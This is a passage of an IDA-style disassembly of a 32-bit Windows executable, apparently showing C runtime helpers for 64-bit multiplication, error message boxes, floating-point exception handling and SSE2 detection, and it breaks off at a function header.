mov ecx, [esp+arg_8]
jnz short loc_40F509
mov eax, [esp+arg_0]
mul ecx
retn 10h
; ---------------------------------------------------------------------------
loc_40F509: ; CODE XREF: sub_40F4F0+E�j
push ebx
mul ecx
mov ebx, eax
mov eax, [esp+4+arg_0]
mul [esp+4+arg_C]
add ebx, eax
mov eax, [esp+4+arg_0]
mul ecx
add edx, ebx
pop ebx
retn 10h
sub_40F4F0 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40F524 proc near ; CODE XREF: sub_409AB4+15D�p
var_30 = dword ptr -30h
var_20 = byte ptr -20h
var_18 = byte ptr -18h
var_14 = byte ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 20h
push ebx
push esi
push edi
call sub_40518A
xor ebx, ebx
cmp ds:dword_426488, ebx
mov [ebp+var_10], eax
mov [ebp+var_4], ebx
mov [ebp+var_8], ebx
mov [ebp+var_C], ebx
jnz loc_40F5F9
push offset aUser32_dll_0 ; "USER32.DLL"
call ds:dword_41D0E8
mov edi, eax
cmp edi, ebx
jnz short loc_40F564
loc_40F55D: ; CODE XREF: sub_40F524+50�j
xor eax, eax
jmp loc_40F6BD
; ---------------------------------------------------------------------------
loc_40F564: ; CODE XREF: sub_40F524+37�j
mov esi, ds:dword_41D0EC
push offset aMessageboxa ; "MessageBoxA"
push edi
call esi
cmp eax, ebx
jz short loc_40F55D
push eax
call sub_405127
mov [esp+30h+var_30], offset aGetactivewindo ; "GetActiveWindow"
push edi
mov ds:dword_426488, eax
call esi
push eax
call sub_405127
mov [esp+30h+var_30], offset aGetlastactivep ; "GetLastActivePopup"
push edi
mov ds:dword_42648C, eax
call esi
push eax
call sub_405127
mov ds:dword_426490, eax
lea eax, [ebp+var_8]
push eax
call sub_407906
test eax, eax
pop ecx
pop ecx
jz short loc_40F5C7
push ebx
push ebx
push ebx
push ebx
push ebx
call sub_402E3D
add esp, 14h
loc_40F5C7: ; CODE XREF: sub_40F524+94�j
cmp [ebp+var_8], 2
jnz short loc_40F5F9
push offset aGetuserobjecti ; "GetUserObjectInformationA"
push edi
call esi
push eax
call sub_405127
cmp eax, ebx
pop ecx
mov ds:dword_426498, eax
jz short loc_40F5F9
push offset aGetprocesswind ; "GetProcessWindowStation"
push edi
call esi
push eax
call sub_405127
pop ecx
mov ds:dword_426494, eax
loc_40F5F9: ; CODE XREF: sub_40F524+22�j
; sub_40F524+A7�j ...
mov eax, ds:dword_426494
mov esi, [ebp+var_10]
cmp eax, esi
jz short loc_40F672
cmp ds:dword_426498, esi
jz short loc_40F672
push eax
call sub_405193
pop ecx
call eax
cmp eax, ebx
jz short loc_40F63F
lea ecx, [ebp+var_14]
push ecx
push 0Ch
lea ecx, [ebp+var_20]
push ecx
push 1
push eax
push ds:dword_426498
call sub_405193
pop ecx
call eax
test eax, eax
jz short loc_40F63F
test [ebp+var_18], 1
jnz short loc_40F672
loc_40F63F: ; CODE XREF: sub_40F524+F4�j
; sub_40F524+113�j
lea eax, [ebp+var_C]
push eax
call sub_40793D
test eax, eax
pop ecx
jz short loc_40F65A
push ebx
push ebx
push ebx
push ebx
push ebx
call sub_402E3D
add esp, 14h
loc_40F65A: ; CODE XREF: sub_40F524+127�j
cmp [ebp+var_C], 4
jb short loc_40F669
or [ebp+arg_8], 200000h
jmp short loc_40F6A3
; ---------------------------------------------------------------------------
loc_40F669: ; CODE XREF: sub_40F524+13A�j
or [ebp+arg_8], 40000h
jmp short loc_40F6A3
; ---------------------------------------------------------------------------
loc_40F672: ; CODE XREF: sub_40F524+DF�j
; sub_40F524+E7�j ...
mov eax, ds:dword_42648C
cmp eax, esi
jz short loc_40F6A3
push eax
call sub_405193
pop ecx
call eax
cmp eax, ebx
mov [ebp+var_4], eax
jz short loc_40F6A3
mov eax, ds:dword_426490
cmp eax, esi
jz short loc_40F6A3
push [ebp+var_4]
push eax
call sub_405193
pop ecx
call eax
mov [ebp+var_4], eax
loc_40F6A3: ; CODE XREF: sub_40F524+143�j
; sub_40F524+14C�j ...
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
push [ebp+var_4]
push ds:dword_426488
call sub_405193
pop ecx
call eax
loc_40F6BD: ; CODE XREF: sub_40F524+3B�j
pop edi
pop esi
pop ebx
leave
retn
sub_40F524 endp
; =============== S U B R O U T I N E =======================================
sub_40F6C2 proc near ; CODE XREF: sub_409AB4+27�p
; sub_409AB4+38�p ...
arg_0 = dword ptr 4
mov ecx, [esp+arg_0]
push esi
xor esi, esi
cmp ecx, esi
jl short loc_40F6EB
cmp ecx, 2
jle short loc_40F6DE
cmp ecx, 3
jnz short loc_40F6EB
mov eax, ds:dword_425A9C
pop esi
retn
; ---------------------------------------------------------------------------
loc_40F6DE: ; CODE XREF: sub_40F6C2+E�j
mov eax, ds:dword_425A9C
mov ds:dword_425A9C, ecx
pop esi
retn
; ---------------------------------------------------------------------------
loc_40F6EB: ; CODE XREF: sub_40F6C2+9�j
; sub_40F6C2+13�j
call sub_4057D3
push esi
push esi
push esi
push esi
push esi
mov dword ptr [eax], 16h
call sub_402F39
add esp, 14h
or eax, 0FFFFFFFFh
pop esi
retn
sub_40F6C2 endp
; =============== S U B R O U T I N E =======================================
sub_40F708 proc near ; CODE XREF: sub_40FD56+5F�p
; DATA XREF: sub_40A42B:loc_40A46D�o
xor eax, eax
retn
sub_40F708 endp
; =============== S U B R O U T I N E =======================================
sub_40F70B proc near ; CODE XREF: sub_40F76B�p
mov eax, offset sub_41134A
mov ds:off_423F80, eax
mov ds:off_423F84, offset sub_410A46
mov ds:off_423F88, offset sub_410A04
mov ds:off_423F8C, offset sub_410A38
mov ds:off_423F90, offset word_4109AE
mov ds:off_423F94, eax
mov ds:off_423F98, offset sub_4112C4
mov ds:off_423F9C, offset sub_4109C4
mov ds:off_423FA0, offset sub_41092E
mov ds:off_423FA4, offset sub_4108BD
retn
sub_40F70B endp
; =============== S U B R O U T I N E =======================================
sub_40F76B proc near ; CODE XREF: sub_407979+1C�p
; DATA XREF: J8@F_7_S:off_41ED94�o
arg_0 = dword ptr 4
call sub_40F70B
call sub_4113D0
cmp [esp+arg_0], 0
mov ds:dword_4264A0, eax
jz short loc_40F786
call sub_41136B
loc_40F786: ; CODE XREF: sub_40F76B+14�j
fnclex
retn
sub_40F76B endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40F789 proc near ; CODE XREF: sub_40F7D9+4D�p
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
push 0Ch
push offset dword_4218E8
call __SEH_prolog4
and [ebp+ms_exc.disabled], 0
movapd xmm0, xmm1
mov [ebp+var_1C], 1
jmp short loc_40F7C9
; ---------------------------------------------------------------------------
mov eax, [ebp+ms_exc.exc_ptr]
mov eax, [eax]
mov eax, [eax]
cmp eax, 0C0000005h
jz short loc_40F7BE
cmp eax, 0C000001Dh
jz short loc_40F7BE
xor eax, eax
retn
; ---------------------------------------------------------------------------
loc_40F7BE: ; CODE XREF: sub_40F789+29�j
; sub_40F789+30�j
xor eax, eax
inc eax
retn
; ---------------------------------------------------------------------------
mov esp, [ebp+ms_exc.old_esp]
and [ebp+var_1C], 0
loc_40F7C9: ; CODE XREF: sub_40F789+1B�j
mov [ebp+ms_exc.disabled], 0FFFFFFFEh
mov eax, [ebp+var_1C]
call __SEH_epilog4
retn
sub_40F789 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40F7D9 proc near ; CODE XREF: sub_40A6DB+7�p sub_40F839�p
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 18h
xor eax, eax
push ebx
mov [ebp+var_4], eax
mov [ebp+var_C], eax
mov [ebp+var_8], eax
push ebx
pushf
pop eax
mov ecx, eax
xor eax, 200000h
push eax
popf
pushf
pop edx
sub edx, ecx
jz short loc_40F81C
push ecx
popf
xor eax, eax
cpuid
mov [ebp+var_C], eax
mov [ebp+var_18], ebx
mov [ebp+var_14], edx
mov [ebp+var_10], ecx
mov eax, 1
cpuid
mov [ebp+var_4], edx
mov [ebp+var_8], eax
loc_40F81C: ; CODE XREF: sub_40F7D9+22�j
pop ebx
test [ebp+var_4], 4000000h
jz short loc_40F834
call sub_40F789
test eax, eax
jz short loc_40F834
xor eax, eax
inc eax
jmp short loc_40F836
; ---------------------------------------------------------------------------
loc_40F834: ; CODE XREF: sub_40F7D9+4B�j
; sub_40F7D9+54�j
xor eax, eax
loc_40F836: ; CODE XREF: sub_40F7D9+59�j
pop ebx
leave
retn
sub_40F7D9 endp
; =============== S U B R O U T I N E =======================================
sub_40F839 proc near ; DATA XREF: J8@F_7_S:0041D2D0�o
call sub_40F7D9
mov ds:dword_433C7C, eax
xor eax, eax
retn
sub_40F839 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40F846 proc near ; CODE XREF: sub_40FE47+4A�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
arg_18 = dword ptr 20h
push ebp
mov ebp, esp
mov eax, [ebp+arg_0]
mov cl, byte ptr [ebp+arg_8]
push ebx
push esi
push edi
xor edi, edi
mov [eax+4], edi
mov eax, [ebp+arg_0]
xor ebx, ebx
mov [eax+8], edi
mov eax, [ebp+arg_0]
inc ebx
test cl, 10h
mov [eax+0Ch], edi
jz short loc_40F878
mov eax, [ebp+arg_0]
or [eax+4], ebx
mov [ebp+arg_8], 0C000008Fh
loc_40F878: ; CODE XREF: sub_40F846+23�j
test cl, 2
jz short loc_40F88B
mov eax, [ebp+arg_0]
or dword ptr [eax+4], 2
mov [ebp+arg_8], 0C0000093h
loc_40F88B: ; CODE XREF: sub_40F846+35�j
test cl, bl
jz short loc_40F89D
mov eax, [ebp+arg_0]
or dword ptr [eax+4], 4
mov [ebp+arg_8], 0C0000091h
loc_40F89D: ; CODE XREF: sub_40F846+47�j
test cl, 4
jz short loc_40F8B0
mov eax, [ebp+arg_0]
or dword ptr [eax+4], 8
mov [ebp+arg_8], 0C000008Eh
loc_40F8B0: ; CODE XREF: sub_40F846+5A�j
test cl, 8
jz short loc_40F8C3
mov eax, [ebp+arg_0]
or dword ptr [eax+4], 10h
mov [ebp+arg_8], 0C0000090h
loc_40F8C3: ; CODE XREF: sub_40F846+6D�j
mov esi, [ebp+arg_4]
mov ecx, [esi]
mov eax, [ebp+arg_0]
shl ecx, 4
not ecx
xor ecx, [eax+8]
and ecx, 10h
xor [eax+8], ecx
mov ecx, [esi]
mov eax, [ebp+arg_0]
add ecx, ecx
not ecx
xor ecx, [eax+8]
and ecx, 8
xor [eax+8], ecx
mov ecx, [esi]
mov eax, [ebp+arg_0]
shr ecx, 1
not ecx
xor ecx, [eax+8]
and ecx, 4
xor [eax+8], ecx
mov ecx, [esi]
mov eax, [ebp+arg_0]
shr ecx, 3
not ecx
xor ecx, [eax+8]
and ecx, 2
xor [eax+8], ecx
mov ecx, [esi]
mov eax, [ebp+arg_0]
shr ecx, 5
not ecx
xor ecx, [eax+8]
and ecx, ebx
xor [eax+8], ecx
call sub_410046
test al, bl
jz short loc_40F932
mov ecx, [ebp+arg_0]
or dword ptr [ecx+0Ch], 10h
loc_40F932: ; CODE XREF: sub_40F846+E3�j
test al, 4
jz short loc_40F93D
mov ecx, [ebp+arg_0]
or dword ptr [ecx+0Ch], 8
loc_40F93D: ; CODE XREF: sub_40F846+EE�j
test al, 8
jz short loc_40F948
mov ecx, [ebp+arg_0]
or dword ptr [ecx+0Ch], 4
loc_40F948: ; CODE XREF: sub_40F846+F9�j
test al, 10h
jz short loc_40F953
mov ecx, [ebp+arg_0]
or dword ptr [ecx+0Ch], 2
loc_40F953: ; CODE XREF: sub_40F846+104�j
test al, 20h
jz short loc_40F95D
mov eax, [ebp+arg_0]
or [eax+0Ch], ebx
loc_40F95D: ; CODE XREF: sub_40F846+10F�j
mov eax, [esi]
mov ecx, 0C00h
and eax, ecx
jz short loc_40F99D
cmp eax, 400h
jz short loc_40F991
cmp eax, 800h
jz short loc_40F982
cmp eax, ecx
jnz short loc_40F9A3
mov eax, [ebp+arg_0]
or dword ptr [eax], 3
jmp short loc_40F9A3
; ---------------------------------------------------------------------------
loc_40F982: ; CODE XREF: sub_40F846+12E�j
mov eax, [ebp+arg_0]
mov ecx, [eax]
and ecx, 0FFFFFFFEh
or ecx, 2
loc_40F98D: ; CODE XREF: sub_40F846+155�j
mov [eax], ecx
jmp short loc_40F9A3
; ---------------------------------------------------------------------------
loc_40F991: ; CODE XREF: sub_40F846+127�j
mov eax, [ebp+arg_0]
mov ecx, [eax]
and ecx, 0FFFFFFFDh
or ecx, ebx
jmp short loc_40F98D
; ---------------------------------------------------------------------------
loc_40F99D: ; CODE XREF: sub_40F846+120�j
mov eax, [ebp+arg_0]
and dword ptr [eax], 0FFFFFFFCh
loc_40F9A3: ; CODE XREF: sub_40F846+132�j
; sub_40F846+13A�j ...
mov eax, [esi]
mov ecx, 300h
and eax, ecx
jz short loc_40F9CE
cmp eax, 200h
jz short loc_40F9C1
cmp eax, ecx
jnz short loc_40F9DB
mov eax, [ebp+arg_0]
and dword ptr [eax], 0FFFFFFE3h
jmp short loc_40F9DB
; ---------------------------------------------------------------------------
loc_40F9C1: ; CODE XREF: sub_40F846+16D�j
mov eax, [ebp+arg_0]
mov ecx, [eax]
and ecx, 0FFFFFFE7h
or ecx, 4
jmp short loc_40F9D9
; ---------------------------------------------------------------------------
loc_40F9CE: ; CODE XREF: sub_40F846+166�j
mov eax, [ebp+arg_0]
mov ecx, [eax]
and ecx, 0FFFFFFEBh
or ecx, 8
loc_40F9D9: ; CODE XREF: sub_40F846+186�j
mov [eax], ecx
loc_40F9DB: ; CODE XREF: sub_40F846+171�j
; sub_40F846+179�j
mov eax, [ebp+arg_0]
mov ecx, [ebp+arg_C]
shl ecx, 5
xor ecx, [eax]
and ecx, 1FFE0h
xor [eax], ecx
mov eax, [ebp+arg_0]
or [eax+20h], ebx
cmp [ebp+arg_18], edi
mov eax, [ebp+arg_0]
mov edi, [ebp+arg_14]
jz short loc_40FA25
and dword ptr [eax+20h], 0FFFFFFE1h
mov eax, [ebp+arg_10]
fld dword ptr [eax]
mov eax, [ebp+arg_0]
fstp dword ptr [eax+10h]
mov eax, [ebp+arg_0]
or [eax+60h], ebx
mov eax, [ebp+arg_0]
and dword ptr [eax+60h], 0FFFFFFE1h
fld dword ptr [edi]
mov eax, [ebp+arg_0]
fstp dword ptr [eax+50h]
jmp short loc_40FA59
; ---------------------------------------------------------------------------
loc_40FA25: ; CODE XREF: sub_40F846+1B7�j
mov ecx, [eax+20h]
and ecx, 0FFFFFFE3h
or ecx, 2
mov [eax+20h], ecx
mov eax, [ebp+arg_10]
fld qword ptr [eax]
mov eax, [ebp+arg_0]
fstp qword ptr [eax+10h]
mov eax, [ebp+arg_0]
or [eax+60h], ebx
mov eax, [ebp+arg_0]
mov ecx, [eax+60h]
and ecx, 0FFFFFFE3h
or ecx, 2
mov [eax+60h], ecx
fld qword ptr [edi]
mov eax, [ebp+arg_0]
fstp qword ptr [eax+50h]
loc_40FA59: ; CODE XREF: sub_40F846+1DD�j
call sub_410051
lea eax, [ebp+arg_0]
push eax
push ebx
push 0
push [ebp+arg_8]
call ds:dword_41D1AC
mov ecx, [ebp+arg_0]
test byte ptr [ecx+8], 10h
jz short loc_40FA7A
and dword ptr [esi], 0FFFFFFFEh
loc_40FA7A: ; CODE XREF: sub_40F846+22F�j
test byte ptr [ecx+8], 8
jz short loc_40FA83
and dword ptr [esi], 0FFFFFFFBh
loc_40FA83: ; CODE XREF: sub_40F846+238�j
test byte ptr [ecx+8], 4
jz short loc_40FA8C
and dword ptr [esi], 0FFFFFFF7h
loc_40FA8C: ; CODE XREF: sub_40F846+241�j
test byte ptr [ecx+8], 2
jz short loc_40FA95
and dword ptr [esi], 0FFFFFFEFh
loc_40FA95: ; CODE XREF: sub_40F846+24A�j
test [ecx+8], bl
jz short loc_40FA9D
and dword ptr [esi], 0FFFFFFDFh
loc_40FA9D: ; CODE XREF: sub_40F846+252�j
mov eax, [ecx]
and eax, 3
xor ebx, ebx
sub eax, ebx
mov edx, 0FFFFF3FFh
jz short loc_40FADC
dec eax
jz short loc_40FACE
dec eax
jz short loc_40FABE
dec eax
jnz short loc_40FADE
or dword ptr [esi], 0C00h
jmp short loc_40FADE
; ---------------------------------------------------------------------------
loc_40FABE: ; CODE XREF: sub_40F846+26B�j
mov eax, [esi]
and eax, 0FFFFFBFFh
or eax, 800h
loc_40FACA: ; CODE XREF: sub_40F846+294�j
mov [esi], eax
jmp short loc_40FADE
; ---------------------------------------------------------------------------
loc_40FACE: ; CODE XREF: sub_40F846+268�j
mov eax, [esi]
and eax, 0FFFFF7FFh
or eax, 400h
jmp short loc_40FACA
; ---------------------------------------------------------------------------
loc_40FADC: ; CODE XREF: sub_40F846+265�j
and [esi], edx
loc_40FADE: ; CODE XREF: sub_40F846+26E�j
; sub_40F846+276�j ...
mov eax, [ecx]
shr eax, 2
and eax, 7
sub eax, ebx
jz short loc_40FAFF
dec eax
jz short loc_40FAF4
dec eax
jnz short loc_40FB0A
and [esi], edx
jmp short loc_40FB0A
; ---------------------------------------------------------------------------
loc_40FAF4: ; CODE XREF: sub_40F846+2A5�j
mov eax, [esi]
and eax, edx
or eax, 200h
jmp short loc_40FB08
; ---------------------------------------------------------------------------
loc_40FAFF: ; CODE XREF: sub_40F846+2A2�j
mov eax, [esi]
and eax, edx
or eax, 300h
loc_40FB08: ; CODE XREF: sub_40F846+2B7�j
mov [esi], eax
loc_40FB0A: ; CODE XREF: sub_40F846+2A8�j
; sub_40F846+2AC�j
cmp [ebp+arg_18], ebx
jz short loc_40FB16
fld dword ptr [ecx+50h]
fstp dword ptr [edi]
jmp short loc_40FB1B
; ---------------------------------------------------------------------------
loc_40FB16: ; CODE XREF: sub_40F846+2C7�j
fld qword ptr [ecx+50h]
fstp qword ptr [edi]
loc_40FB1B: ; CODE XREF: sub_40F846+2CE�j
pop edi
pop esi
pop ebx
pop ebp
retn
sub_40F846 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40FB20 proc near ; CODE XREF: sub_40FE47+21�p
var_28 = qword ptr -28h
var_10 = qword ptr -10h
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 10h
mov eax, [ebp+arg_0]
push ebx
push esi
xor ebx, ebx
mov esi, eax
and esi, 1Fh
inc ebx
test al, 8
mov [ebp+var_4], esi
jz short loc_40FB4E
test byte ptr [ebp+arg_8], bl
jz short loc_40FB4E
push ebx
call sub_410084
pop ecx
and esi, 0FFFFFFF7h
jmp loc_40FCDF
; ---------------------------------------------------------------------------
loc_40FB4E: ; CODE XREF: sub_40FB20+18�j
; sub_40FB20+1D�j
test al, 4
jz short loc_40FB68
test byte ptr [ebp+arg_8], 4
jz short loc_40FB68
push 4
call sub_410084
pop ecx
and esi, 0FFFFFFFBh
jmp loc_40FCDF
; ---------------------------------------------------------------------------
loc_40FB68: ; CODE XREF: sub_40FB20+30�j
; sub_40FB20+36�j
test al, bl
jz loc_40FC0A
test byte ptr [ebp+arg_8], 8
jz loc_40FC0A
push 8
call sub_410084
mov eax, [ebp+arg_8]
pop ecx
mov ecx, 0C00h
and eax, ecx
jz short loc_40FBE2
cmp eax, 400h
jz short loc_40FBCC
cmp eax, 800h
jz short loc_40FBB6
cmp eax, ecx
jnz short loc_40FC02
fldz
mov ecx, [ebp+arg_4]
fcomp qword ptr [ecx]
fnstsw ax
fld ds:dbl_4240C8
test ah, 5
jnp short loc_40FC00
jmp short loc_40FBFE
; ---------------------------------------------------------------------------
loc_40FBB6: ; CODE XREF: sub_40FB20+7A�j
fldz
mov ecx, [ebp+arg_4]
fcomp qword ptr [ecx]
fnstsw ax
test ah, 5
jnp short loc_40FBF0
fld ds:dbl_4240C8
jmp short loc_40FBFE
; ---------------------------------------------------------------------------
loc_40FBCC: ; CODE XREF: sub_40FB20+73�j
fldz
mov ecx, [ebp+arg_4]
fcomp qword ptr [ecx]
fnstsw ax
test ah, 5
jp short loc_40FBF8
fld ds:dbl_4240C8
jmp short loc_40FC00
; ---------------------------------------------------------------------------
loc_40FBE2: ; CODE XREF: sub_40FB20+6C�j
fldz
mov ecx, [ebp+arg_4]
fcomp qword ptr [ecx]
fnstsw ax
test ah, 5
jp short loc_40FBF8
loc_40FBF0: ; CODE XREF: sub_40FB20+A2�j
fld ds:dbl_4240B8
jmp short loc_40FC00
; ---------------------------------------------------------------------------
loc_40FBF8: ; CODE XREF: sub_40FB20+B8�j
; sub_40FB20+CE�j
fld ds:dbl_4240B8
loc_40FBFE: ; CODE XREF: sub_40FB20+94�j
; sub_40FB20+AA�j
fchs
loc_40FC00: ; CODE XREF: sub_40FB20+92�j
; sub_40FB20+C0�j ...
fstp qword ptr [ecx]
loc_40FC02: ; CODE XREF: sub_40FB20+7E�j
and esi, 0FFFFFFFEh
jmp loc_40FCDF
; ---------------------------------------------------------------------------
loc_40FC0A: ; CODE XREF: sub_40FB20+4A�j
; sub_40FB20+54�j
test al, 2
jz loc_40FCDF
test byte ptr [ebp+arg_8], 10h
jz loc_40FCDF
xor esi, esi
test al, 10h
jz short loc_40FC24
mov esi, ebx
loc_40FC24: ; CODE XREF: sub_40FB20+100�j
fldz
push edi
mov edi, [ebp+arg_4]
fcomp qword ptr [edi]
fnstsw ax
test ah, 44h
jnp loc_40FCC9
fld qword ptr [edi]
lea eax, [ebp+var_8]
push eax ; int
push ecx
push ecx ; double
fstp [esp+28h+var_28]
call sub_40FF97
mov ecx, [ebp+var_8]
fstp [ebp+var_10]
add ecx, 0FFFFFA00h
add esp, 0Ch
cmp ecx, 0FFFFFBCEh
jge short loc_40FC6B
fld [ebp+var_10]
mov esi, ebx
fmul ds:dbl_41EE18
jmp short loc_40FCBF
; ---------------------------------------------------------------------------
loc_40FC6B: ; CODE XREF: sub_40FB20+13C�j
fldz
fcomp [ebp+var_10]
fnstsw ax
test ah, 41h
jnz short loc_40FC7B
mov edx, ebx
jmp short loc_40FC7D
; ---------------------------------------------------------------------------
loc_40FC7B: ; CODE XREF: sub_40FB20+155�j
xor edx, edx
loc_40FC7D: ; CODE XREF: sub_40FB20+159�j
movzx eax, byte ptr [ebp+var_10+6]
and eax, 0Fh
or eax, 10h
mov word ptr [ebp+var_10+6], ax
mov eax, 0FFFFFC03h
cmp ecx, eax
jge short loc_40FCB6
sub eax, ecx
loc_40FC96: ; CODE XREF: sub_40FB20+194�j
test byte ptr [ebp+var_10], bl
jz short loc_40FCA1
test esi, esi
jnz short loc_40FCA1
mov esi, ebx
loc_40FCA1: ; CODE XREF: sub_40FB20+179�j
; sub_40FB20+17D�j
shr dword ptr [ebp+var_10], 1
test byte ptr [ebp+var_10+4], bl
jz short loc_40FCB0
or dword ptr [ebp+var_10], 80000000h
loc_40FCB0: ; CODE XREF: sub_40FB20+187�j
shr dword ptr [ebp+var_10+4], 1
dec eax
jnz short loc_40FC96
loc_40FCB6: ; CODE XREF: sub_40FB20+172�j
test edx, edx
jz short loc_40FCC2
fld [ebp+var_10]
fchs
loc_40FCBF: ; CODE XREF: sub_40FB20+149�j
fstp [ebp+var_10]
loc_40FCC2: ; CODE XREF: sub_40FB20+198�j
fld [ebp+var_10]
fstp qword ptr [edi]
jmp short loc_40FCCB
; ---------------------------------------------------------------------------
loc_40FCC9: ; CODE XREF: sub_40FB20+111�j
mov esi, ebx
loc_40FCCB: ; CODE XREF: sub_40FB20+1A7�j
test esi, esi
pop edi
jz short loc_40FCD8
push 10h
call sub_410084
pop ecx
loc_40FCD8: ; CODE XREF: sub_40FB20+1AE�j
and [ebp+var_4], 0FFFFFFFDh
mov esi, [ebp+var_4]
loc_40FCDF: ; CODE XREF: sub_40FB20+29�j
; sub_40FB20+43�j ...
test byte ptr [ebp+arg_0], 10h
jz short loc_40FCF6
test byte ptr [ebp+arg_8], 20h
jz short loc_40FCF6
push 20h
call sub_410084
pop ecx
and esi, 0FFFFFFEFh
loc_40FCF6: ; CODE XREF: sub_40FB20+1C3�j
; sub_40FB20+1C9�j
xor eax, eax
test esi, esi
pop esi
setz al
pop ebx
leave
retn
sub_40FB20 endp
; =============== S U B R O U T I N E =======================================
sub_40FD01 proc near ; CODE XREF: sub_40FD56+6C�p
; sub_40FD56+91�p ...
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
cmp eax, 1
jz short loc_40FD1D
jle short locret_40FD28
cmp eax, 3
jg short locret_40FD28
call sub_4057D3
mov dword ptr [eax], 22h
retn
; ---------------------------------------------------------------------------
loc_40FD1D: ; CODE XREF: sub_40FD01+7�j
call sub_4057D3
mov dword ptr [eax], 21h
locret_40FD28: ; CODE XREF: sub_40FD01+9�j
; sub_40FD01+E�j
retn
sub_40FD01 endp
; =============== S U B R O U T I N E =======================================
sub_40FD29 proc near ; CODE XREF: sub_40FE47+55�p
arg_0 = byte ptr 4
mov al, [esp+arg_0]
test al, 20h
jz short loc_40FD35
push 5
jmp short loc_40FD4B
; ---------------------------------------------------------------------------
loc_40FD35: ; CODE XREF: sub_40FD29+6�j
test al, 8
jz short loc_40FD3D
xor eax, eax
inc eax
retn
; ---------------------------------------------------------------------------
loc_40FD3D: ; CODE XREF: sub_40FD29+E�j
test al, 4
jz short loc_40FD45
push 2
jmp short loc_40FD4B
; ---------------------------------------------------------------------------
loc_40FD45: ; CODE XREF: sub_40FD29+16�j
test al, 1
jz short loc_40FD4D
push 3
loc_40FD4B: ; CODE XREF: sub_40FD29+A�j
; sub_40FD29+1A�j
pop eax
retn
; ---------------------------------------------------------------------------
loc_40FD4D: ; CODE XREF: sub_40FD29+1E�j
movzx eax, al
and eax, 2
add eax, eax
retn
sub_40FD29 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_40FD56(int,int,int,int,int,int,double,int)
sub_40FD56 proc near ; CODE XREF: sub_40FDF4+2A�p
; sub_40FE47+87�p
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = qword ptr -8
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
arg_18 = qword ptr 20h
arg_20 = dword ptr 28h
push ebp
mov ebp, esp
sub esp, 20h
xor eax, eax
loc_40FD5E: ; CODE XREF: sub_40FD56+18�j
mov ecx, ds:dword_423FD0[eax*8]
cmp ecx, [ebp+arg_4]
jz short loc_40FDCE
inc eax
cmp eax, 1Dh
jl short loc_40FD5E
xor eax, eax
loc_40FD72: ; CODE XREF: sub_40FD56+7F�j
test eax, eax
mov [ebp+var_1C], eax
jz short loc_40FDD7
mov eax, [ebp+arg_8]
mov [ebp+var_18], eax
mov eax, [ebp+arg_C]
mov [ebp+var_14], eax
mov eax, [ebp+arg_10]
mov [ebp+var_10], eax
mov eax, [ebp+arg_14]
push esi
mov esi, [ebp+arg_0]
mov [ebp+var_C], eax
mov eax, dword ptr [ebp+arg_18]
mov dword ptr [ebp+var_8], eax
mov eax, dword ptr [ebp+arg_18+4]
push 0FFFFh
push [ebp+arg_20]
mov [ebp+var_20], esi
mov dword ptr [ebp+var_8+4], eax
call sub_41005D
lea eax, [ebp+var_20]
push eax
call sub_40F708
add esp, 0Ch
test eax, eax
jnz short loc_40FDC8
push esi
call sub_40FD01
pop ecx
loc_40FDC8: ; CODE XREF: sub_40FD56+69�j
fld [ebp+var_8]
pop esi
leave
retn
; ---------------------------------------------------------------------------
loc_40FDCE: ; CODE XREF: sub_40FD56+12�j
mov eax, ds:off_423FD4[eax*8]
jmp short loc_40FD72
; ---------------------------------------------------------------------------
loc_40FDD7: ; CODE XREF: sub_40FD56+21�j
push 0FFFFh
push [ebp+arg_20]
call sub_41005D
push [ebp+arg_0]
call sub_40FD01
fld [ebp+arg_18]
add esp, 0Ch
leave
retn
sub_40FD56 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_40FDF4(int,double,int)
sub_40FDF4 proc near ; CODE XREF: sub_40A6EF+51�p
var_1C = qword ptr -1Ch
var_14 = qword ptr -14h
var_C = qword ptr -0Ch
arg_0 = dword ptr 8
arg_4 = qword ptr 0Ch
arg_C = dword ptr 14h
push ebp
mov ebp, esp
cmp ds:dword_423FC0, 0
jnz short loc_40FE28
push [ebp+arg_C] ; int
fld [ebp+arg_4]
sub esp, 18h
fstp [esp+1Ch+var_C]
fldz
fstp [esp+1Ch+var_14]
fld [ebp+arg_4]
fstp [esp+1Ch+var_1C]
push [ebp+arg_0] ; int
push 1 ; int
call sub_40FD56
add esp, 24h
pop ebp
retn
; ---------------------------------------------------------------------------
loc_40FE28: ; CODE XREF: sub_40FDF4+A�j
call sub_4057D3
push 0FFFFh
push [ebp+arg_C]
mov dword ptr [eax], 21h
call sub_41005D
fld [ebp+arg_4]
pop ecx
pop ecx
pop ebp
retn
sub_40FDF4 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_40FE47(int,int,double,double,int)
